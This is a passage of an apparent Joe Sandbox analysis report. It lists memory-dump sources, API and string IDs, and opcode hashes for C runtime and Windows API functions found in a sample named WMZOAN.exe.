                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CreateFrameInfo__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2558813199-1018135373
                                            • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                            • Instruction ID: 3f530ccdf84eb6b22e4b54b71aaac78048654cbaa97401d085703643f929d5d2
                                            • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                            • Instruction Fuzzy Hash: 5A5162BA61878196D621EF35E88826D77A4FB89B90F180174EBCD17B55CF3CE461CB00
                                            APIs
                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FFB23B0821E
                                              • Part of subcall function 00007FFB23B08BE0: HeapFree.KERNEL32 ref: 00007FFB23B08BF6
                                              • Part of subcall function 00007FFB23B08BE0: GetLastError.KERNEL32 ref: 00007FFB23B08C00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
                                            • String ID: 3T$C:\Users\user\Documents\WMZOAN.exe
                                            • API String ID: 2724796048-3983934549
                                            • Opcode ID: c7b6bf20ccc4f9845d0c36dee35ecfe46c8e6b938c98f74557c05a74a3d0106e
                                            • Instruction ID: f5e6c968a4f643340020bf4fce3554ba52c45f1717354d1577bbc7becd4f653f
                                            • Opcode Fuzzy Hash: c7b6bf20ccc4f9845d0c36dee35ecfe46c8e6b938c98f74557c05a74a3d0106e
                                            • Instruction Fuzzy Hash: F94180BAA08A9285EB16EF31EC941BD6694BF44BC0B4C4075F9CE97B85DE3DE6418300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                            • Instruction ID: 523c8c87dd673b167e10579d1f79c7fa65344ea14935052ba305674c4325a4f8
                                            • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                            • Instruction Fuzzy Hash: 3741A76AB29A8181DB21CF75E8883AD6761FB88B94F484131EECE97794DF7CD441CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID: csm
                                            • API String ID: 3997070919-1018135373
                                            • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                            • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                            • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                            • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                            APIs
                                              • Part of subcall function 00007FFB23B03A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFB23B03A63
                                            • __GSHandlerCheckCommon.LIBCMT ref: 00007FFB23B10993
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CheckCommonHandler__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 1543384424-629598281
                                            • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                            • Instruction ID: fa796d30b5a922cca8df2527cadca46efd0e11325c261140cc4c356438ce6e0c
                                            • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                            • Instruction Fuzzy Hash: 2C11DF66A187C185E711AF36E8892AD6664EB44FC0F0C8075EECC2BB46CE38D951C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: TimerWaitable
                                            • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                            • API String ID: 1823812067-484248852
                                            • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                            • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                            • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                            • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                            APIs
                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFB23B0112F), ref: 00007FFB23B039E0
                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFB23B0112F), ref: 00007FFB23B03A21
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                            • Instruction ID: c094a7921cee73de9344df31890d9729a7e9ed610c00b176b462ce203e0db6bf
                                            • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                            • Instruction Fuzzy Hash: 55111976A18B8182EB628F25E84826DB7E5FB88B84F5C4270DACD17B58DF3DD5518B00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: TimerWaitable
                                            • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                            • API String ID: 1823812067-3336177065
                                            • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                            • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                            • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                            • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                            • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                            • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                            • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710